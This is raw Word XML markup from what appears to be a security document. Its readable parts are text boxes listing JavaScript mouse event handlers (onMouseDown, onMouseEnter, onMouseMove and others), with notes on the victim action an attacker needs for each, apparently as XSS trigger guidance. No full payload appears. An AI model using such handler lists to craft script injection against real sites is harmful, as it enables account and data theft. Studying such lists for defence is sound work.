                                  <a:pt x="114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Text Box 99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11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onMouseDown()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89" o:spid="_x0000_s1443" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:58.35pt;height:9.15pt;z-index:15802880;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="116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">
                <v:shape id="Freeform 991" o:spid="_x0000_s1444" style="position:absolute;left:1930;top:166;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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aQi8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPUWvCMBSF3wX/Q7jCXmSmjiHaGWUThMLwQecPuDR3&#10;bbG5KUnaxn+/DAQfD+ec73C2+2haMZDzjWUFy0UGgri0uuFKwfXn+LoG4QOyxtYyKbiTh/1uOtli&#10;ru3IZxouoRIJwj5HBXUIXS6lL2sy6Be2I07er3UGQ5KuktrhmOCmlW9ZtpIGG04LNXZ0qKm8XXqj&#10;4HT4igV+j87HYujf+/n1LO83pV5m8fMDRKAYnuFHu9AKNusN/J9JR0D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2kIvEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,348;21,348;18,348;0,327;0,324;0,187;21,166;1146,166;1167,187;1167,327;1149,348;1146,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 990" o:spid="_x0000_s1445" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:116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qdW8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPPWvDMBDdC/0P4grdarkZQuxaMaG0ECiUOM7Q8Wpd&#10;bGHr5Fpq4vz7aAhkfLzvopztIE40eeNYwWuSgiBunDbcKjjUny8rED4gaxwck4ILeSjXjw8F5tqd&#10;uaLTPrQihrDPUUEXwphL6ZuOLPrEjcSRO7rJYohwaqWe8BzD7SAXabqUFg3Hhg5Heu+o6ff/VsHm&#10;h6sP8/f9u6uOlanrLOWvZa/U89O8eQMRaA538c291QqyLM6PZ+IRkO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qdW8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onMouseDown()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0112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321310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="985" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="506"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="986" name="Freeform 988"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="506"/>
                            <a:ext cx="1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 689 506"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 689 506"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 688 506"/>
                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 668 506"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 664 506"/>
                              <a:gd name="T19" fmla="*/ 664 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 528 506"/>
                              <a:gd name="T23" fmla="*/ 528 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 506 506"/>
                              <a:gd name="T27" fmla="*/ 506 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 506 506"/>
                              <a:gd name="T31" fmla="*/ 506 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 528 506"/>
                              <a:gd name="T35" fmla="*/ 528 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 668 506"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 688 506"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252"/>
                              <a:gd name="T46" fmla="+- 0 689 506"/>
                              <a:gd name="T47" fmla="*/ 6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52" h="183">
                                <a:moveTo>
                                  <a:pt x="1231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1231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 98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06"/>
                            <a:ext cx="1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onMouseEnter()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86" o:spid="_x0000_s1446" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:25.3pt;width:62.6pt;height:9.15pt;z-index:-17615360;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,506" coordsize="125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">
                <v:shape id="Freeform 988" o:spid="_x0000_s1447" style="position:absolute;left:1930;top:506;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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Djm8MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE78L+h/AWvNlUheJ2jbIrCPYk6np/2zzb&#10;avNSm6j13xtB8DjMzDfMdN6ZWlypdZVlBcMoBkGcW11xoeBvtxxMQDiPrLG2TAru5GA+++hNMdX2&#10;xhu6bn0hAoRdigpK75tUSpeXZNBFtiEO3sG2Bn2QbSF1i7cAN7UcxXEiDVYcFkpsaFFSftpejIJx&#10;0u3dUh/W+/9sda9+TTY8HzOl+p/dzzcIT51/h1/tlVbwNUngeSYcAT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Djm8MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1231,183l21,183r-3,-1l,162r,-4l,22,21,,1231,r21,22l1252,162r-18,20l1231,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,689;21,689;18,688;0,668;0,664;0,528;21,506;1231,506;1252,528;1252,668;1234,688;1231,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 987" o:spid="_x0000_s1448" type="#_x0000_t202" style="position:absolute;left:1930;top:506;width:125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qT8sQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNe7CauopIBUEoxnjw+Mw+&#10;k8Xs25hdNf57VxA8DjPzDTOedrYWF2q9cazgq5+AIC6cNlwq2OaLzyEIH5A11o5JwY08TCfvb2NM&#10;tbtyRpdNKEWEsE9RQRVCk0rpi4os+r5riKN3cK3FEGVbSt3iNcJtLb+TZCAtGo4LFTY0r6g4bs5W&#10;wWzH2Z85/e/X2SEzeT5KeDU4KtX76Ga/IAJ14RV+tpdawWj4A48z8QjIy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6k/L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onMouseEnter()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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click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image)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(cursor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>moves</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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object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area)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="13" w:line="424" w:lineRule="auto"/>
        <w:ind w:left="359" w:right="276" w:firstLine="8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0163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12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="795020" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="982" name="Group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5020" cy="116205"/>
                          <a:chOff x="1930" y="19"/>
                          <a:chExt cx="1252" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="983" name="Freeform 985"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="19"/>
                            <a:ext cx="1252" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3161 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1252"/>
                              <a:gd name="T2" fmla="+- 0 201 19"/>
                              <a:gd name="T3" fmla="*/ 201 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1252"/>
                              <a:gd name="T6" fmla="+- 0 201 19"/>
                              <a:gd name="T7" fmla="*/ 201 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1252"/>
                              <a:gd name="T10" fmla="+- 0 201 19"/>
                              <a:gd name="T11" fmla="*/ 201 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1252"/>
                              <a:gd name="T14" fmla="+- 0 180 19"/>
                              <a:gd name="T15" fmla="*/ 180 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1252"/>
                              <a:gd name="T18" fmla="+- 0 177 19"/>
                              <a:gd name="T19" fmla="*/ 177 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1252"/>
                              <a:gd name="T22" fmla="+- 0 40 19"/>
                              <a:gd name="T23" fmla="*/ 40 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1252"/>
                              <a:gd name="T26" fmla="+- 0 19 19"/>
                              <a:gd name="T27" fmla="*/ 19 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3161 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1252"/>
                              <a:gd name="T30" fmla="+- 0 19 19"/>
                              <a:gd name="T31" fmla="*/ 19 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3182 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1252"/>
                              <a:gd name="T34" fmla="+- 0 40 19"/>
                              <a:gd name="T35" fmla="*/ 40 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3182 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1252"/>
                              <a:gd name="T38" fmla="+- 0 180 19"/>
                              <a:gd name="T39" fmla="*/ 180 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3164 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1252"/>
                              <a:gd name="T42" fmla="+- 0 201 19"/>
                              <a:gd name="T43" fmla="*/ 201 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3161 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1252"/>
                              <a:gd name="T46" fmla="+- 0 201 19"/>
                              <a:gd name="T47" fmla="*/ 20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52" h="183">
                                <a:moveTo>
                                  <a:pt x="123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231" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123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Text Box 98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9"/>
                            <a:ext cx="1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onMouseLeave()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83" o:spid="_x0000_s1449" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.95pt;width:62.6pt;height:9.15pt;z-index:-17614848;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,19" coordsize="125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">
                <v:shape id="Freeform 985" o:spid="_x0000_s1450" style="position:absolute;left:1930;top:19;width:1252;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="125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AA8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEb2uqgmg1LSoI9rSsf+7P5tlW&#10;m5faRK3ffrOwsMdhZn7DLNPO1OJJrassKxgNIxDEudUVFwqOh+3nDITzyBpry6TgTQ7SpPexxFjb&#10;F3/Tc+8LESDsYlRQet/EUrq8JINuaBvi4F1sa9AH2RZSt/gKcFPLcRRNpcGKw0KJDW1Kym/7h1Ew&#10;mXYnt9WXr9M5272rtclG92um1KDfrRYgPHX+P/zX3mkF89kEfs+EIyC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nQAPEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1231,182l21,182r-3,l,161r,-3l,21,21,,1231,r21,21l1252,161r-18,21l1231,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1231,201;21,201;18,201;0,180;0,177;0,40;21,19;1231,19;1252,40;1252,180;1234,201;1231,201" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 984" o:spid="_x0000_s1451" type="#_x0000_t202" style="position:absolute;left:1930;top:19;width:125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gNhcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNpYhJ3YgUCwVBGuOhx9fs&#10;S7KYfZtmtxr/fVcQPA4z8w2zXI22EycavHGs4GWagCCunDbcKDiUH88LED4ga+wck4ILeVjljw9L&#10;zLQ7c0GnfWhEhLDPUEEbQp9J6auWLPqp64mjV7vBYohyaKQe8BzhtpOzJJlLi4bjQos9vbdUHfd/&#10;VsH6m4uN+d39fBV1YcoyTXg7Pyo1eRrXbyACjeEevrU/tYJ08Q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A2F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onMouseLeave()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04416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227965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="979" name="Group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6205"/>
                          <a:chOff x="1930" y="359"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="980" name="Freeform 982"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="359"/>
                            <a:ext cx="1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 542 359"/>
                              <a:gd name="T3" fmla="*/ 542 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 542 359"/>
                              <a:gd name="T7" fmla="*/ 542 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 541 359"/>
                              <a:gd name="T11" fmla="*/ 541 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 521 359"/>
                              <a:gd name="T15" fmla="*/ 521 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 517 359"/>
                              <a:gd name="T19" fmla="*/ 517 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 381 359"/>
                              <a:gd name="T23" fmla="*/ 381 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 359 359"/>
                              <a:gd name="T27" fmla="*/ 359 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 359 359"/>
                              <a:gd name="T31" fmla="*/ 359 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 381 359"/>
                              <a:gd name="T35" fmla="*/ 381 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 521 359"/>
                              <a:gd name="T39" fmla="*/ 521 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 541 359"/>
                              <a:gd name="T43" fmla="*/ 541 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167"/>
                              <a:gd name="T46" fmla="+- 0 542 359"/>
                              <a:gd name="T47" fmla="*/ 54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67" h="183">
                                <a:moveTo>
                                  <a:pt x="1146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1146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1146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Text Box 98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59"/>
                            <a:ext cx="11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onMouseMove()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80" o:spid="_x0000_s1452" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:17.95pt;width:58.35pt;height:9.15pt;z-index:15804416;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,359" coordsize="116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">
                <v:shape id="Freeform 982" o:spid="_x0000_s1453" style="position:absolute;left:1930;top:359;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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w5FsEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP3WrCMBS+H/gO4QjeDE03hrhqFCcMCsMLnQ9waI5t&#10;sTkpSdrGtzcXgpcf3/9mF00rBnK+sazgY5GBIC6tbrhScPn/na9A+ICssbVMCu7kYbedvG0w13bk&#10;Ew3nUIkUwj5HBXUIXS6lL2sy6Be2I07c1TqDIUFXSe1wTOGmlZ9ZtpQGG04NNXZ0qKm8nXuj4Hj4&#10;iQX+jc7HYui/+vfLSd5vSs2mcb8GESiGl/jpLrSC71Wan86kIyC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MORbBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1146,183l21,183r-3,-1l,162r,-4l,22,21,,1146,r21,22l1167,162r-18,20l1146,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,542;21,542;18,541;0,521;0,517;0,381;21,359;1146,359;1167,381;1167,521;1149,541;1146,542" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 981" o:spid="_x0000_s1454" type="#_x0000_t202" style="position:absolute;left:1930;top:359;width:116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+uHcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IKvdWNHoJG1yDFgiCUxvTQ4zP7&#10;TJZk36bZNab/vlso9DjMzDfMNp9sJ0YavHGsYDFPQBBXThuuFXyUr88rED4ga+wck4Jv8pDvZg9b&#10;zLS7c0HjOdQiQthnqKAJoc+k9FVDFv3c9cTRu7rBYohyqKUe8B7htpPLJEmlRcNxocGeXhqq2vPN&#10;Kth/cnEwX2+X9+JamLJcJ3xKW6WeHqf9BkSgKfyH/9pHrWC9WsDvmXg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X64d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onMouseMove()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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mouse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>over</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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image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table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off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>again)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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need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mouse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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table)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="12" w:line="424" w:lineRule="auto"/>
        <w:ind w:left="359" w:right="276" w:hanging="85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04928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11430</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="976" name="Group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070" cy="116205"/>
                          <a:chOff x="1930" y="18"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="977" name="Freeform 979"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="18"/>
                            <a:ext cx="1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 200 18"/>
                              <a:gd name="T3" fmla="*/ 200 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 200 18"/>
                              <a:gd name="T7" fmla="*/ 200 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 200 18"/>
                              <a:gd name="T11" fmla="*/ 200 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 179 18"/>
                              <a:gd name="T15" fmla="*/ 179 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 176 18"/>
                              <a:gd name="T19" fmla="*/ 176 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 39 18"/>
                              <a:gd name="T23" fmla="*/ 39 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 18 18"/>
                              <a:gd name="T27" fmla="*/ 18 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 18 18"/>
                              <a:gd name="T31" fmla="*/ 18 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 39 18"/>
                              <a:gd name="T35" fmla="*/ 39 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 179 18"/>
                              <a:gd name="T39" fmla="*/ 179 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 200 18"/>
                              <a:gd name="T43" fmla="*/ 200 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082"/>
                              <a:gd name="T46" fmla="+- 0 200 18"/>
                              <a:gd name="T47" fmla="*/ 20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2" h="183">
                                <a:moveTo>
                                  <a:pt x="106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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106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Text Box 97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8"/>
                            <a:ext cx="108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onMouseOut()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77" o:spid="_x0000_s1455" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:.9pt;width:54.1pt;height:9.15pt;z-index:15804928;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,18" coordsize="108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">
                <v:shape id="Freeform 979" o:spid="_x0000_s1456" style="position:absolute;left:1930;top:18;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="108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8cfcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74X+h/AK3mq2CnW7GqUKSsEerPXS22Pz&#10;drO4eVmSuG77602h0OMwM98wi9VgW9GTD41jBU/jDARx6XTDtYLT5/YxBxEissbWMSn4pgCr5f3d&#10;AgvtrvxB/THWIkE4FKjAxNgVUobSkMUwdh1x8irnLcYkfS21x2uC21ZOsuxZWmw4LRjsaGOoPB8v&#10;VkFtd2u73Ve5eT+h/7kc+nz6VSk1ehhe5yAiDfE//Nd+0wpeZjP4PZOO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8cfcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1061,182l21,182r-3,l,161r,-3l,21,21,,1061,r21,21l1082,161r-18,21l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,200;21,200;18,200;0,179;0,176;0,39;21,18;1061,18;1082,39;1082,179;1064,200;1061,200" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
